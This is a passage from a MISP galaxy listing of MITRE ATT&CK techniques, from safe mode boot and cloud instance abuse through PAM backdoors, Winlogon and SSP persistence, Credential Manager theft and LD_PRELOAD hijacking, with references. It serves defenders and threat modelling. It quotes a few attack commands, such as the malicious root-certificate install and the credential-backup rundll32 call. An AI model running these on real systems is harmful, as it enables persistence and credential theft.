Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)

Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)

Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Safe Mode Boot - T1562.009"

Table 5740. Table References

Links

https://attack.mitre.org/techniques/T1562/009

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit

https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg

https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/

https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234

https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/

https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise

https://www.cybereason.com/blog/medusalocker-ransomware

Create Cloud Instance - T1578.002

An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)

Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.

The tag is: misp-galaxy:mitre-attack-pattern="Create Cloud Instance - T1578.002"

Table 5741. Table References

Links

https://attack.mitre.org/techniques/T1578/002

https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/

https://cloud.google.com/logging/docs/audit#admin-activity

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs

Code Signing Certificates - T1587.002

Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.

Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1587.002"

Table 5742. Table References

Links

https://attack.mitre.org/techniques/T1587/002

https://en.wikipedia.org/wiki/Code_signing

Purchase Technical Data - T1597.002

Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.

Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Purchase Technical Data - T1597.002"

Table 5743. Table References

Links

https://attack.mitre.org/techniques/T1597/002

https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/

Virtual Private Server - T1583.003

Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.

Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)

The tag is: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1583.003"

Table 5744. Table References

Links

https://attack.mitre.org/techniques/T1583/003

https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://threatconnect.com/blog/infrastructure-research-hunting/

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

Install Root Certificate - T1553.004

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root’s chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)

Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)

In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004"

Table 5745. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf

https://attack.mitre.org/techniques/T1553/004

https://docs.microsoft.com/sysinternals/downloads/sigcheck

https://en.wikipedia.org/wiki/Root_certificate

https://objective-see.com/blog/blog_0x26.html

https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/

https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/

Virtual Private Server - T1584.003

Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)

Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.

The tag is: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1584.003"

Table 5746. Table References

Links

https://attack.mitre.org/techniques/T1584/003

https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://threatconnect.com/blog/infrastructure-research-hunting/

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

Time Based Evasion - T1497.003

Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.

Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)

Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)

Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment’s timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)

The tag is: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003"

Table 5747. Table References

Links

https://attack.mitre.org/techniques/T1497/003

https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/

https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes

https://www.joesecurity.org/blog/3660886847485093803

https://www.joesecurity.org/blog/498839998833561473

https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique

Application Exhaustion Flood - T1499.003

Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Application Exhaustion Flood - T1499.003"

Table 5748. Table References

Links

https://attack.mitre.org/techniques/T1499/003

https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

Pluggable Authentication Modules - T1556.003

Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)

Adversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)

Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)

The tag is: misp-galaxy:mitre-attack-pattern="Pluggable Authentication Modules - T1556.003"

Table 5749. Table References

Links

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules

https://attack.mitre.org/techniques/T1556/003

https://github.com/zephrax/linux-pam-backdoor

https://linux.die.net/man/8/pam_unix

https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt

https://x-c3ll.github.io/posts/PAM-backdoor-DNS/

Runtime Data Manipulation - T1565.003

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1565.003"

Table 5750. Table References

Links

https://attack.mitre.org/techniques/T1565/003

https://content.fireeye.com/apt/rpt-apt38

https://www.justice.gov/opa/press-release/file/1092091/download

Spearphishing via Service - T1566.003

Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target’s interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that’s running in an environment. The adversary can then send malicious links or attachments through these services.

A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it’s something they were expecting. If the payload doesn’t work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003"

Table 5751. Table References

Links

https://attack.mitre.org/techniques/T1566/003

Delete Cloud Instance - T1578.003

An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.

An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Delete Cloud Instance - T1578.003"

Table 5752. Table References

Links

https://attack.mitre.org/techniques/T1578/003

https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/

https://cloud.google.com/logging/docs/audit#admin-activity

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs

Code Signing Certificates - T1588.003

Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.

Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1588.003"

Table 5753. Table References

Links

https://attack.mitre.org/techniques/T1588/003

https://en.wikipedia.org/wiki/Code_signing

NTFS File Attributes - T1564.004

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)

Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)

The tag is: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004"

Table 5754. Table References

Links

http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html

http://msdn.microsoft.com/en-us/library/aa364404

https://attack.mitre.org/techniques/T1564/004

https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/

https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/

https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/

https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea

https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore

Winlogon Helper DLL - T1547.004

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013)

Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)

  • Winlogon\Notify - points to notification package DLLs that handle Winlogon events

  • Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on

  • Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004"

Table 5755. Table References

Links

https://attack.mitre.org/techniques/T1547/004

https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order

https://technet.microsoft.com/en-us/sysinternals/bb963902

Windows Credential Manager - T1555.004

Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)

The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.

Credential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\. The encryption key can be found in a file named <code>Policy.vpol</code>, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)

Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. <code>vaultcmd.exe</code> is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as <code>CredEnumerateA</code>, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)

Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running <code>rundll32.exe keymgr.dll KRShowKeyMgr</code> then selecting the “Back up…​” button on the “Stored User Names and Passwords” GUI.

Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004"

Table 5756. Table References

Links

https://attack.mitre.org/techniques/T1555/004

https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store

https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea

https://github.com/gentilkiwi/mimikatz/wiki/howto--credential-manager-saved-credentials

https://www.passcape.com/windows_password_recovery_vault_explorer

Network Device Authentication - T1556.004

Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.

[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: Mandiant - Synful Knock)

The tag is: misp-galaxy:mitre-attack-pattern="Network Device Authentication - T1556.004"

Table 5757. Table References

Links

https://attack.mitre.org/techniques/T1556/004

https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

https://tools.cisco.com/security/center/resources/integrity_assurance.html#7

https://www.mandiant.com/resources/synful-knock-acis

Hidden File System - T1564.005

Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)

Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)

The tag is: misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005"

Table 5758. Table References

Links

https://attack.mitre.org/techniques/T1564/005

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf

https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html

https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html

https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf

Security Support Provider - T1547.005

Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs.

The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1547.005"

Table 5759. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/techniques/T1547/005

https://technet.microsoft.com/en-us/library/dn408187.aspx

Run Virtual Instance - T1564.006

Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)

Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006"

Table 5760. Table References

Links

https://attack.mitre.org/techniques/T1564/006

https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx

Netsh Helper DLL - T1546.007

Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.

Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)

The tag is: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007"

Table 5761. Table References

Links

https://attack.mitre.org/techniques/T1546/007

https://github.com/outflankbv/NetshHelperBeacon

https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html

https://technet.microsoft.com/library/bb490939.aspx

Dynamic Linker Hijacking - T1574.006

Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)

On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process’s memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the <code>export</code> command, <code>setenv</code> function, or <code>putenv</code> function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s <code>os.environ</code>.

On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary’s malicious code upon execution of the victim program. <code>LD_PRELOAD</code> can be set via the environment variable or <code>/etc/ld.so.preload</code> file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by <code>LD_PRELOAD</code> are loaded and mapped into memory by <code>dlopen()</code> and <code>mmap()</code> respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers)

On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the <code>DYLD_INSERT_LIBRARIES</code> environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006"

Table 5762. Table References

Links

http://hick.org/code/skape/papers/needle.txt

http://phrack.org/issues/51/8.html

http://www.nth-dimension.org.uk/pub/BTL.pdf

https://attack.mitre.org/techniques/T1574/006

https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html

https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191

https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/

https://www.baeldung.com/linux/ld_preload-trick-what-is

https://www.datawire.io/code-injection-on-linux-and-macos/

https://www.man7.org/linux/man-pages/man8/ld.so.8.html

